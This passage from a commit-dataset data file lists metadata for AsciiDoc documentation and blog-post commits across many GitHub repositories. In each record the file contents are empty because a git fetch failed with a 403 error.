eschlowp\/elasticsearch,kingaj\/elasticsearch,sdauletau\/elasticsearch,aglne\/elasticsearch,xingguang2013\/elasticsearch,brandonkearby\/elasticsearch,cnfire\/elasticsearch-1,weipinghe\/elasticsearch,onegambler\/elasticsearch,camilojd\/elasticsearch,pranavraman\/elasticsearch,uschindler\/elasticsearch,szroland\/elasticsearch,sreeramjayan\/elasticsearch,awislowski\/elasticsearch,kunallimaye\/elasticsearch,AndreKR\/elasticsearch,zkidkid\/elasticsearch,AleksKochev\/elasticsearch,Kakakakakku\/elasticsearch,sneivandt\/elasticsearch,yanjunh\/elasticsearch,wenpos\/elasticsearch,opendatasoft\/elasticsearch,SergVro\/elasticsearch,luiseduardohdbackup\/elasticsearch,andrestc\/elasticsearch,s1monw\/elasticsearch,Microsoft\/elasticsearch,GlenRSmith\/elasticsearch,mbrukman\/elasticsearch,shreejay\/elasticsearch,sjohnr\/elasticsearch,mbrukman\/elasticsearch,wimvds\/elasticsearch,codebunt\/elasticsearch,mortonsykes\/elasticsearch,phani546\/elasticsearch,nazarewk\/elasticsearch,clintongormley\/elasticsearch,yongminxia\/elasticsearch,Collaborne\/elasticsearch,socialrank\/elasticsearch,beiske\/elasticsearch,Kakakakakku\/elasticsearch,mnylen\/elasticsearch,pozhidaevak\/elasticsearch,vvcephei\/elasticsearch,abhijitiitr\/es,heng4fun\/elasticsearch,sscarduzio\/elasticsearch,Shekharrajak\/elasticsearch,iacdingping\/elasticsearch,javachengwc\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Liziyao\/elasticsearch,xpandan\/elasticsearch,schonfeld\/elasticsearch,schonfeld\/elasticsearch,adrianbk\/elasticsearch,phani546\/elasticsearch,franklanganke\/elasticsearch,Siddartha07\/elasticsearch,Shepard1212\/elasticsearch,tahaemin\/elasticsearch,jsgao0\/elasticsearch,elasticdog\/elasticsearch,palecur\/elasticsearch,tsohil\/elasticsearch,NBSW\/elasticsearch,petmit\/elasticsearch,xingguang2013\/elasticsearch,clintongormley\/elasticsearch,petabytedata\/elasticsearch,s1monw\/elasticsearch,iamjakob\/elasticsearch,ricardocerq\/elasticsearch,areek\/elasticsearch,HarishAtGitHub\/elasticsearch,bestwpw\/elasticsearch,diendt\/elasticsearch,abibell\/elasticsearch,sdauletau\/elasticsearch,tsohil\/elasticsearch,ulkas\/elasticsearch,18098924759\/elasticsearch,kimimj\/elasticsearch,mapr\/elasticsearch,martinstuga\/elasticsearch,fernandozhu\/elasticsearch,zeroctu\/elasticsearch,vrkansagara\/elasticsearch,GlenRSmith\/elasticsearch,karthikjaps\/elasticsearch,huypx1292\/elasticsearch,mcku\/elasticsearch,zeroctu\/elasticsearch,kaneshin\/elasticsearch","old_file":"docs\/java-api\/index_.asciidoc","new_file":"docs\/java-api\/index_.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81383c4b429dd8db2c5bfa339b4b930242ad9673","subject":"manual.adoc: Fix SCE URL","message":"manual.adoc: Fix SCE URL\n","repos":"ybznek\/openscap,jan-cerny\/openscap,ybznek\/openscap,redhatrises\/openscap,ybznek\/openscap,mpreisler\/openscap,mpreisler\/openscap,jan-cerny\/openscap,redhatrises\/openscap,mpreisler\/openscap,jan-cerny\/openscap,Hexadorsimal\/openscap,jan-cerny\/openscap,OpenSCAP\/openscap,mpreisler\/openscap,OpenSCAP\/openscap,OpenSCAP\/openscap,jan-cerny\/openscap,redhatrises\/openscap,Hexadorsimal\/openscap,OpenSCAP\/openscap,Hexadorsimal\/openscap,mpreisler\/openscap,Hexadorsimal\/openscap,OpenSCAP\/openscap,Hexadorsimal\/openscap,ybznek\/openscap,redhatrises\/openscap,mpreisler\/openscap,OpenSCAP\/openscap,redhatrises\/openscap,Hexadorsimal\/openscap,jan-cerny\/openscap,redhatrises\/openscap,ybznek\/openscap,ybznek\/openscap","old_file":"docs\/manual\/manual.adoc","new_file":"docs\/manual\/manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jan-cerny\/openscap.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"68c185747ddefb0f085ac2e5a4f460e957e802d8","subject":"release notes: changes to ksck reporting updates","message":"release notes: changes to ksck reporting updates\n\nCovers:\nhttps:\/\/github.com\/apache\/kudu\/commit\/d869b8033ac0026d585ab1d5bc69a1ba205357fa\n\nChange-Id: Ia7bae8e1d298f4222bd1697f44098630000b5880\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9593\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nTested-by: Kudu Jenkins\n","repos":"cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5fc3a64b845220328720a57626fae5b0921eb6e","subject":"Followup to 7eaeb6d9: fix typo in schema_design.adoc","message":"Followup to 7eaeb6d9: fix typo in schema_design.adoc\n\nAccidentally wrote 'unix_microtime' instead of 'unixtime_micros' in the\ndocumentation in the previous patch.\n\nI also separated out the 64-bit types for better clarity, since it\nwasn't obvious before that 'unixtime_micros' is a 64-bit type.\n\nChange-Id: Ied008e4ae1dea0243cb944470cbad2053bebd3d7\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4354\nTested-by: Kudu Jenkins\nReviewed-by: Adar Dembo <866ca730bfc7f544e3ebce604ceeba4879f23df0@cloudera.com>\n","repos":"helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,helifu\/kudu","old_file":"docs\/schema_design.adoc","new_file":"docs\/schema_design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e19957d5c5b47afb7a4bfc384999de53a3aac000","subject":"Update 2016-12-18-goggles.adoc","message":"Update 2016-12-18-goggles.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-12-18-goggles.adoc","new_file":"_posts\/2016-12-18-goggles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3c0cfb88d0de727263b94876311789d203ee298","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0a673b76773796a2cb5bbd91c777da8b901f2eba","subject":"Update 2017-11-19-.adoc","message":"Update 2017-11-19-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-19-.adoc","new_file":"_posts\/2017-11-19-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d00f21ee09474148fe65c7551c1f7a259fa6338f","subject":"docs: devel: clarify parsing and model conversion.","message":"docs: devel: clarify parsing and model conversion.\n\nSigned-off-by: jaa127 <5d4b395afd293423da3540113194aa7266e85bd8@sn127.fi>","repos":"jaa127\/tackler,jaa127\/tackler,jaa127\/tackler","old_file":"docs\/devel\/design.adoc","new_file":"docs\/devel\/design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaa127\/tackler.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cce24c3859f11de4e3238572d620339610a18937","subject":"Update 2015-07-06-Liebes-Tagebuch.adoc","message":"Update 2015-07-06-Liebes-Tagebuch.adoc","repos":"visionui\/visionui.github.io,visionui\/visionui.github.io,visionui\/visionui.github.io","old_file":"_posts\/2015-07-06-Liebes-Tagebuch.adoc","new_file":"_posts\/2015-07-06-Liebes-Tagebuch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/visionui\/visionui.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5679191be806677b59b4bd6dcbe16c4f5e6ffc1","subject":"Update 2017-12-01-SVG-and-Angular.adoc","message":"Update 2017-12-01-SVG-and-Angular.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-12-01-SVG-and-Angular.adoc","new_file":"_posts\/2017-12-01-SVG-and-Angular.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d1e51355a72c7686fd5cdc65258af38cf9555de","subject":"Added a README for the creation of OSGi application images.","message":"Added a README for the creation of OSGi application images.\n\nThe document describes the OsgiImagePlugin used to generate executable\nimages for the LineDJ applications.\n","repos":"oheger\/LineDJ","old_file":"images\/README.adoc","new_file":"images\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oheger\/LineDJ.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bac648126b449bba98d927ebf336ee282ac775e2","subject":"Update 2015-03-12-testig.adoc","message":"Update 2015-03-12-testig.adoc","repos":"jimmidyson\/testblog,jimmidyson\/testblog,jimmidyson\/testblog","old_file":"_posts\/2015-03-12-testig.adoc","new_file":"_posts\/2015-03-12-testig.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jimmidyson\/testblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a19aca198fc903cf6398c5e7102711e104e6701a","subject":"Update 2016-03-18-Introduction-a-Bitcoin.adoc","message":"Update 2016-03-18-Introduction-a-Bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Introduction-a-Bitcoin.adoc","new_file":"_posts\/2016-03-18-Introduction-a-Bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35fa145f545a2e957478a86381305ae73496aaa6","subject":"Update 2017-07-01-Winter-vacation-part-1.adoc","message":"Update 2017-07-01-Winter-vacation-part-1.adoc","repos":"endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io,endymion64\/VinJBlog","old_file":"_posts\/2017-07-01-Winter-vacation-part-1.adoc","new_file":"_posts\/2017-07-01-Winter-vacation-part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endymion64\/endymion64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b06eb4a94f84c8d82c06231cc6b77d471bc3b6fa","subject":"Update 2015-02-27-First-post.adoc","message":"Update 2015-02-27-First-post.adoc","repos":"pdudits\/hubpress,pdudits\/hubpress,pdudits\/hubpress,pdudits\/hubpress,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io,pdudits\/pdudits.github.io","old_file":"_posts\/2015-02-27-First-post.adoc","new_file":"_posts\/2015-02-27-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pdudits\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97f1ec124a2747f258ff43780b0c56e2c5e9f87f","subject":"Update 2016-08-17-2016-08-15.adoc","message":"Update 2016-08-17-2016-08-15.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-08-17-2016-08-15.adoc","new_file":"_posts\/2016-08-17-2016-08-15.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"515075099f53c3adeae4c8b25e52dcacd241d1a4","subject":"Update 2016-11-05-Dear-Diary.adoc","message":"Update 2016-11-05-Dear-Diary.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_file":"_posts\/2016-11-05-Dear-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"25d48237c8d31220e0eb33a3b7b414aa7f59beca","subject":"Create 2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","message":"Create 2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","repos":"Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de,Bloggerschmidt\/bloggerschmidt.de","old_file":"_posts\/2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","new_file":"_posts\/2015-02-16-jQuery-Formularfelder-validieren-Die-Eierlegendewollmilchsau-FormValidation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Bloggerschmidt\/bloggerschmidt.de.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc632a8907e237aed86bcc1ff6eccf1de2de238b","subject":"Add blog placeholder","message":"Add blog placeholder\n","repos":"scepta\/scepta.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/2015-03-03-1.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/2015-03-03-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scepta\/scepta.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"34dea5ebcda32b4bb068db9a181323982815b4e6","subject":"Add a README.asciidoc","message":"Add a README.asciidoc\n","repos":"ekie\/kakoune,zakgreant\/kakoune,flavius\/kakoune,flavius\/kakoune,Asenar\/kakoune,danielma\/kakoune,zakgreant\/kakoune,occivink\/kakoune,Asenar\/kakoune,flavius\/kakoune,xificurC\/kakoune,elegios\/kakoune,occivink\/kakoune,mawww\/kakoune,danielma\/kakoune,elegios\/kakoune,rstacruz\/kakoune,Somasis\/kakoune,alexherbo2\/kakoune,rstacruz\/kakoune,mawww\/kakoune,Somasis\/kakoune,casimir\/kakoune,danr\/kakoune,Asenar\/kakoune,alpha123\/kakoune,jjthrash\/kakoune,rstacruz\/kakoune,mawww\/kakoune,ekie\/kakoune,xificurC\/kakoune,alpha123\/kakoune,casimir\/kakoune,danr\/kakoune,zakgreant\/kakoune,ekie\/kakoune,elegios\/kakoune,lenormf\/kakoune,jjthrash\/kakoune,casimir\/kakoune,jjthrash\/kakoune,rstacruz\/kakoune,occivink\/kakoune,jkonecny12\/kakoune,Somasis\/kakoune,lenormf\/kakoune,lenormf\/kakoune,alexherbo2\/kakoune,alpha123\/kakoune,jkonecny12\/kakoune,elegios\/kakoune,Asenar\/kakoune,casimir\/kakoune,ekie\/kakoune,xificurC\/kakoune,alexherbo2\/kakoune,danielma\/kakoune,alexherbo2\/kakoune,zakgreant\/kakoune,Somasis\/kakoune,lenormf\/kakoune,danielma\/kakoune,jkonecny12\/kakoune,mawww\/kakoune,xificurC\/kakoune,danr\/kakoune,occivink\/kakoune,danr\/kakoune,jkonecny12\/kakoune,alpha123\/kakoune,jjthrash\/kakoune,flavius\/kakoune","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"ece672a27a9d5da9f44c004487c33d7d47cc8c75","subject":"anotehr small update2","message":"anotehr small update2\n","repos":"dimagol\/trex-core,dproc\/trex_odp_porting_integration,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dproc\/trex_odp_porting_integration,wofanli\/trex-core,wofanli\/trex-core,dimagol\/trex-core,wofanli\/trex-core,dproc\/trex_odp_porting_integration,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dproc\/trex_odp_porting_integration,wofanli\/trex-core,wofanli\/trex-core,dimagol\/trex-core,dproc\/trex_odp_porting_integration,dimagol\/trex-core,dproc\/trex_odp_porting_integration,wofanli\/trex-core","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fe9bc385db5a3df5836ede6e7a0b485c956df69b","subject":"initial cut of GEP-3","message":"initial cut of GEP-3\n","repos":"groovy\/groovy-website,groovy\/groovy-website","old_file":"site\/src\/site\/wiki\/GEP-3.adoc","new_file":"site\/src\/site\/wiki\/GEP-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/groovy\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7caafca102875ac40b7a811bc8f63af80dd61bed","subject":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","message":"Update 2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_file":"_posts\/2016-04-04-Errores-de-capa-8-contrasenas-debiles.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c7eea7b848bf5652066009449a6268a616170e31","subject":"Update 2016-06-15-The-softer-side-of-programming-Part-1.adoc","message":"Update 2016-06-15-The-softer-side-of-programming-Part-1.adoc","repos":"tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io","old_file":"_posts\/2016-06-15-The-softer-side-of-programming-Part-1.adoc","new_file":"_posts\/2016-06-15-The-softer-side-of-programming-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedroeloffzen\/tedroeloffzen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52b611a33513963e7aa6cb6de678c6e64c103ab4","subject":"Update 2017-01-18-Pancake-C-M-S-Improvements-Week2-Blog.adoc","message":"Update 2017-01-18-Pancake-C-M-S-Improvements-Week2-Blog.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-01-18-Pancake-C-M-S-Improvements-Week2-Blog.adoc","new_file":"_posts\/2017-01-18-Pancake-C-M-S-Improvements-Week2-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5df5da1e4be7359f7dca5d13aecef6161094f236","subject":"y2b create post You've Never Seen Headphones Like This...","message":"y2b create post You've Never Seen Headphones Like This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-28-Youve-Never-Seen-Headphones-Like-This.adoc","new_file":"_posts\/2017-01-28-Youve-Never-Seen-Headphones-Like-This.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f46871bf00443b49cf1eb7fd7ec9400c1583b34a","subject":"Additions to NOTES.adoc","message":"Additions to NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aff34265c3e430d542fc16f44c2986173050065","subject":"Add affinity filter into requirements","message":"Add affinity filter into requirements\n","repos":"markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack,markllama\/openshift-on-openstack,redhat-openstack\/openshift-on-openstack","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markllama\/openshift-on-openstack.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6f7fe394caf2d30452aee775c3e06e8b0a07d752","subject":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","message":"Update 2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","repos":"patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io,patricekrakow\/patricekrakow.github.io","old_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_file":"_posts\/2016-08-10-How-I-installed-Go-on-my-corporate-Windows-laptop-without-administrator-rights.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/patricekrakow\/patricekrakow.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05698e18e44d2aaa7d9b5723a7e5f2686ae9dfcf","subject":"Polish","message":"Polish\n","repos":"chrylis\/spring-boot,olivergierke\/spring-boot,kdvolder\/spring-boot,scottfrederick\/spring-boot,donhuvy\/spring-boot,mbenson\/spring-boot,izeye\/spring-boot,aahlenst\/spring-boot,brettwooldridge\/spring-boot,cleverjava\/jenkins2-course-spring-boot,dreis2211\/spring-boot,vpavic\/spring-boot,jxblum\/spring-boot,xiaoleiPENG\/my-project,ilayaperumalg\/spring-boot,nebhale\/spring-boot,olivergierke\/spring-boot,ollie314\/spring-boot,jayarampradhan\/spring-boot,aahlenst\/spring-boot,zhangshuangquan\/spring-root,bijukunjummen\/spring-boot,kdvolder\/spring-boot,hello2009chen\/spring-boot,NetoDevel\/spring-boot,sebastiankirsch\/spring-boot,zhangshuangquan\/spring-root,bclozel\/spring-boot,sbcoba\/spring-boot,javyzheng\/spring-boot,bbrouwer\/spring-boot,rweisleder\/spring-boot,cleverjava\/jenkins2-course-spring-boot,afroje-reshma\/spring-boot-sample,philwebb\/spring-boot-concourse,hello2009chen\/spring-boot,vpavic\/spring-boot,olivergierke\/spring-boot,mrumpf\/spring-boot,felipeg48\/spring-boot,pvorb\/spring-boot,cleverjava\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,scottfrederick\/spring-boot,i007422\/jenkins2-course-spring-boot,joansmith\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,bijukunjummen\/spring-boot,lenicliu\/spring-boot,thomasdarimont\/spring-boot,habuma\/spring-boot,lenicliu\/spring-boot,jmnarloch\/spring-boot,SaravananParthasarathy\/SPSDemo,royclarkson\/spring-boot,zhanhb\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,rweisleder\/spring-boot,mdeinum\/spring-boot,ameraljovic\/spring-boot,joshiste\/spring-boot,i007422\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,afroje-reshma\/spring-boot-sample,nebhale\/spring-boot,SaravananParthasarathy\/SPSDemo,bijukunjummen\/spring-boot,joshthornhill\/spring-boot,mbenson\/spring-boot,ptahchiev\/spring-boot,donhuvy\/spring-boot,habuma\/spring-boot,philwebb\/spring-boot-concourse,shangyi0102\/spring-boot,olivergierke\/spring-boot,afroje-reshma\/spring-boot-sample,htynkn\/spring-boot,jmnarloch\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,jxblum\/spring-boot,mbenson\/spring-boot,pvorb\/spring-boot,NetoDevel\/spring-boot,tsachev\/spring-boot,philwebb\/spring-boot-concourse,chrylis\/spring-boot,jxblum\/spring-boot,qerub\/spring-boot,shangyi0102\/spring-boot,minmay\/spring-boot,bbrouwer\/spring-boot,lexandro\/spring-boot,royclarkson\/spring-boot,ptahchiev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,joansmith\/spring-boot,jbovet\/spring-boot,linead\/spring-boot,sebastiankirsch\/spring-boot,jvz\/spring-boot,drumonii\/spring-boot,ilayaperumalg\/spring-boot,lexandro\/spring-boot,thomasdarimont\/spring-boot,sbcoba\/spring-boot,zhangshuangquan\/spring-root,rweisleder\/spring-boot,pvorb\/spring-boot,habuma\/spring-boot,philwebb\/spring-boot,ilayaperumalg\/spring-boot,isopov\/spring-boot,herau\/spring-boot,dreis2211\/spring-boot,michael-simons\/spring-boot,rweisleder\/spring-boot,mosoft521\/spring-boot,Nowheresly\/spring-boot,dfa1\/spring-boot,herau\/spring-boot,kdvolder\/spring-boot,jbovet\/spring-boot,RichardCSantana\/spring-boot,neo4j-contrib\/spring-boot,drumonii\/spring-boot,ptahchiev\/spring-boot,hqrt\/jenkins2-course-spring-boot,hello2009chen\/spring-boot,olivergierke\/spring-boot,bclozel\/spring-boot,SaravananParthasarathy\/SPSDemo,vakninr\/spring-boot,bclozel\/spring-boot,Buzzardo\/spring-boot,candrews\/spring-boot,hqrt\/jenkins2-course-spring-boot,yhj630520\/spring-boot,tsachev\/spring-boot,wilkinsona\/spring-boot,bclozel\/spring-boot,mdeinum\/spring-boot,hello2009chen\/spring-boot,ihoneymon\/spring-boot,htynkn\/spring-boot,tiarebalbi\/spring-boot,habuma\/spring-boot,isopov